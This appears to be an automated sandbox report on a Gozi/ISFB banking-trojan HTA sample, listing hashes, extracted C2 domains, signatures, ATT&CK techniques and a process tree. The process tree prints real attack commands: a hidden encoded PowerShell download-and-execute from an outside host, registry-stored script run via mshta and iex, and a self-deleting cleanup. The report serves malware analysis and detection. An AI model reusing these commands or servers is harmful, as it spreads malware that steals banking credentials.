Overview

overview

10

Static

static

1

4380de3cba...3d.hta

windows7-x64

10

4380de3cba...3d.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-10-2023 01:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta

  • Size

    22KB

  • MD5

    57d3eb665f1e9e6a19f278baabd49e7b

  • SHA1

    44566a9d716e6abd0304544dd88d245fea990882

  • SHA256

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

  • SHA512

    30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d

  • SSDEEP

    384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3780
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4768
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4008
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3084
        • C:\Windows\SysWOW64\mshta.exe
          C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4392
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1736
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1520
              • C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe
                "C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:3572
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 476
                  6⤵
                  • Program crash
                  PID:3836
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Unus='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Unus).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1452
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uvrqujwoi -value gp; new-alias -name pqacwur -value iex; pqacwur ([System.Text.Encoding]::ASCII.GetString((uvrqujwoi "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1700
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcwnolyo\lcwnolyo.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2288
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80A5.tmp" "c:\Users\Admin\AppData\Local\Temp\lcwnolyo\CSCCCFBA5768410434E9C5B8F52E939F6.TMP"
                5⤵
                  PID:460
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14nnqh35\14nnqh35.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2916
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BE.tmp" "c:\Users\Admin\AppData\Local\Temp\14nnqh35\CSCE776E024DA2549E5A34A8DACDA7E89CD.TMP"
                  5⤵
                    PID:5024
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1372
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3612
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2868
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:1656
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3572 -ip 3572
              1⤵
                PID:2504

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Privilege Escalation

              Defense Evasion

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                16KB

                MD5

                caa76713e6c4b2b72b9283b3f2d3db0a

                SHA1

                daca80b2c21a2a4680451dc11dca9673b9d65e82

                SHA256

                8e29fc9d7984f198613f1f5b514bc61e6c7d1a9a3989fc1d21abbd07bb9c21b8

                SHA512

                a20c703135217c2fdd80449947ff73fe729291317e1844dec300f4e111830a95f6197a4d5f3387b3d467f3acd908a5d1d0ca9242667af8b1abe2cb95cd184d79

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\14nnqh35\14nnqh35.dll
                Filesize

                3KB

                MD5

                c092a54c5bc2ffc500b0f5482364e238

                SHA1

                e6b7602128d5c1aa2a64579ef27c33b8d1a5d785

                SHA256

                20a5d87a7226d54e06562d107f736cc572ce6848e8c119464e130fd74651a8d3

                SHA512

                a11c24bc383f7d3c40fb22ac549dc2d0302e2ae2add76096d62429884cb29ca85904c4c06db3c605ef82586f9066364968b68ebd6e1d133f3b9923019808be38

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe
                Filesize

                274KB

                MD5

                d18f3fecf6d28ddd0f4cf4a9b53c0aec

                SHA1

                05263b9ec69fcf48cc71443ba23545fabe21df12

                SHA256

                911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                SHA512

                4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe
                Filesize

                274KB

                MD5

                d18f3fecf6d28ddd0f4cf4a9b53c0aec

                SHA1

                05263b9ec69fcf48cc71443ba23545fabe21df12

                SHA256

                911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                SHA512

                4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\OPaUZKCu.exe
                Filesize

                274KB

                MD5

                d18f3fecf6d28ddd0f4cf4a9b53c0aec

                SHA1

                05263b9ec69fcf48cc71443ba23545fabe21df12

                SHA256

                911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                SHA512

                4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES80A5.tmp
                Filesize

                1KB

                MD5

                46cf2f664f3b879cd829d2c0d0981851

                SHA1

                dcb0611bed68df4115d9f46ba552af1ddf6a085b

                SHA256

                56b30c2a3fa78a744a6449caea11acf499a959eec53ce678903c4bcb6f50fdb1

                SHA512

                717794d21fa868fc44cc3962fc3fa5afa101bf20e4f0a994d6bfec8b6cdf67ed772f5ef9e62c940ccca6cf84bbf0fc2eee5de563c22a03e3c87f5fd3b16dfc8e

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES81BE.tmp
                Filesize

                1KB

                MD5

                4ede5683ad69f3737421352bec97a0ec

                SHA1

                7a288aa8f51b756d5e7b1ce8de5891902de3cb9f

                SHA256

                8e0ea22aebcb75a76d3515fbd35156d6be4f435f7e534460cf8226bca6fe6efc

                SHA512

                e380b357cf2738974368180c55ef117fa5b2d15cf9436e3d2ce77a81733e40b0b8704a897dc76b910ad416e6875b067825516a540e1d5f7147264870734965d8

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uju1elhj.xmj.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\lcwnolyo\lcwnolyo.dll
                Filesize

                3KB

                MD5

                1dfd29afc1e82881113c2869cba83f71

                SHA1

                2a6cba50a782635a3b99ccccc668a5a28118dcfd

                SHA256

                ef275a33212bb934f99909af1d985377168020f01b033466cc6d371e30493d45

                SHA512

                52bd42846e60a6377b35266c8c3bb480998f0dd289ed0d34418675ba4b7b168ec08d62f0ea6ce76e9f94bfe34852990ec149596ce9939a94024ba04cbab502a7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\14nnqh35\14nnqh35.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\14nnqh35\14nnqh35.cmdline
                Filesize

                369B

                MD5

                8d8434d6a4ef44944e0fb1dcc90ed67a

                SHA1

                a54f72f1ded40007f3ef3b7025b11cbccd2a5b44

                SHA256

                b928c5eca28fb0dc9a9842762dcb69d8823198af5707cb5d15482ab430e3cf06

                SHA512

                baca95b9b288d7fd1ace301c465f2c445d786db36a999e4806c97be4ad609dd0fceeb615c4e9759ade3304221d1716cc233898767aff4d6e48b26d67e5e35ec2

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\14nnqh35\CSCE776E024DA2549E5A34A8DACDA7E89CD.TMP
                Filesize

                652B

                MD5

                e3b8937e37b97d265204e91e010d456d

                SHA1

                1deac8a7a7f6f181b05c0e8b298ba7a91880dde1

                SHA256

                0442f2406501f2ce8c58dac3243dd8a26bab75df6956687cdda6ad1893d9bec4

                SHA512

                1f537eebb894dd03634871664e0aa97422b0840dece0d21fc7b5a3b609c0653a3e2f7c0b6c11addc4d5d30d1dfd3355f3cd1f0c9fa1b024e4354ee012eea61b7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\lcwnolyo\CSCCCFBA5768410434E9C5B8F52E939F6.TMP
                Filesize

                652B

                MD5

                e29d33e2f0f5023213b79db894cc6b1b

                SHA1

                ef1e587f4a56249955a1732c94e711fe136f75de

                SHA256

                515ae277c70118f58e8fddaa1762da9fca7a024bf755004e442624abff0b999a

                SHA512

                2f6047f68fdf5b43bfe2cd9b50cbe1078d03068028423ca858234d70303dd07fb2e87d9b017abeabd97ce35a55686fcc6dcbbe4b475e254132b797bbc9649048

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\lcwnolyo\lcwnolyo.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\lcwnolyo\lcwnolyo.cmdline
                Filesize

                369B

                MD5

                dbaf2b0516cb0a0272f8591b92b27dcc

                SHA1

                8b5e7cb1f502be7d1c76a78bf3a38fbbaa039654

                SHA256

                9df2040ff5e633d2c9182d40839382cbb17337395d13ceb5427a2f2c9cef1d36

                SHA512

                9ab1a89e9437dd2fcb27a7ce22cfd007303debe6f43f7d57967ebaefdcf05ea44a931fbb36eaebd1f1aea7acc6aad2ac078d21725c7ad8dfaee9156b8c2396b4

                Download Submit
              • memory/1372-154-0x00000241A6760000-0x00000241A6804000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1372-134-0x00000241A6810000-0x00000241A6811000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1372-131-0x00000241A6760000-0x00000241A6804000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1520-1-0x00000000051C0000-0x00000000051D0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1520-17-0x00000000065C0000-0x00000000065DE000-memory.dmp
                Filesize

                120KB

                Download
              • memory/1520-35-0x00000000706E0000-0x0000000070E90000-memory.dmp
                Filesize

                7.7MB

                Download
              • memory/1520-19-0x00000000051C0000-0x00000000051D0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1520-20-0x0000000007C00000-0x000000000827A000-memory.dmp
                Filesize

                6.5MB

                Download
              • memory/1520-16-0x00000000060D0000-0x0000000006424000-memory.dmp
                Filesize

                3.3MB

                Download
              • memory/1520-21-0x0000000006AB0000-0x0000000006ACA000-memory.dmp
                Filesize

                104KB

                Download
              • memory/1520-23-0x00000000078C0000-0x0000000007956000-memory.dmp
                Filesize

                600KB

                Download
              • memory/1520-2-0x0000000002FB0000-0x0000000002FE6000-memory.dmp
                Filesize

                216KB

                Download
              • memory/1520-24-0x0000000007860000-0x0000000007882000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1520-3-0x0000000005800000-0x0000000005E28000-memory.dmp
                Filesize

                6.2MB

                Download
              • memory/1520-0-0x00000000706E0000-0x0000000070E90000-memory.dmp
                Filesize

                7.7MB

                Download
              • memory/1520-6-0x0000000005F40000-0x0000000005FA6000-memory.dmp
                Filesize

                408KB

                Download
              • memory/1520-4-0x00000000057C0000-0x00000000057E2000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1520-18-0x00000000065F0000-0x000000000663C000-memory.dmp
                Filesize

                304KB

                Download
              • memory/1520-25-0x0000000008830000-0x0000000008DD4000-memory.dmp
                Filesize

                5.6MB

                Download
              • memory/1520-5-0x0000000005ED0000-0x0000000005F36000-memory.dmp
                Filesize

                408KB

                Download
              • memory/1656-125-0x000002C1A87C0000-0x000002C1A87C1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1656-155-0x000002C1A8710000-0x000002C1A87B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1656-124-0x000002C1A8710000-0x000002C1A87B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1700-103-0x00007FF8BAFB0000-0x00007FF8BBA71000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1700-74-0x000001A979590000-0x000001A979598000-memory.dmp
                Filesize

                32KB

                Download
              • memory/1700-60-0x000001A9795A0000-0x000001A9795B0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1700-59-0x00007FF8BAFB0000-0x00007FF8BBA71000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/1700-49-0x000001A979460000-0x000001A979482000-memory.dmp
                Filesize

                136KB

                Download
              • memory/1700-88-0x000001A979720000-0x000001A979728000-memory.dmp
                Filesize

                32KB

                Download
              • memory/1700-90-0x000001A979730000-0x000001A97976D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/1700-104-0x000001A979730000-0x000001A97976D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/2868-139-0x0000000000FC0000-0x0000000001058000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2868-149-0x0000000000FC0000-0x0000000001058000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2868-148-0x0000000000FC0000-0x0000000001058000-memory.dmp
                Filesize

                608KB

                Download
              • memory/2868-146-0x0000000000A40000-0x0000000000A41000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3084-93-0x0000000000A40000-0x0000000000A41000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3084-92-0x0000000008890000-0x0000000008934000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3084-132-0x0000000008890000-0x0000000008934000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3572-39-0x00000000022D0000-0x00000000022DB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/3572-151-0x0000000000400000-0x000000000228B000-memory.dmp
                Filesize

                30.5MB

                Download
              • memory/3572-44-0x00000000023B0000-0x00000000024B0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3572-43-0x0000000000400000-0x000000000228B000-memory.dmp
                Filesize

                30.5MB

                Download
              • memory/3572-40-0x0000000002310000-0x000000000231D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/3572-37-0x00000000023B0000-0x00000000024B0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/3572-38-0x0000000000400000-0x000000000228B000-memory.dmp
                Filesize

                30.5MB

                Download
              • memory/3612-138-0x0000028925F90000-0x0000028926034000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3612-153-0x0000028925F90000-0x0000028926034000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3612-143-0x0000028925E20000-0x0000028925E21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3780-140-0x00000225756B0000-0x0000022575754000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3780-107-0x0000022572FC0000-0x0000022572FC1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3780-106-0x00000225756B0000-0x0000022575754000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-150-0x000001FBB30B0000-0x000001FBB3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-112-0x000001FBB30B0000-0x000001FBB3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4008-113-0x000001FBB3070000-0x000001FBB3071000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4768-119-0x000001A2381B0000-0x000001A2381B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4768-152-0x000001A23A3A0000-0x000001A23A444000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4768-118-0x000001A23A3A0000-0x000001A23A444000-memory.dmp
                Filesize

                656KB

                Download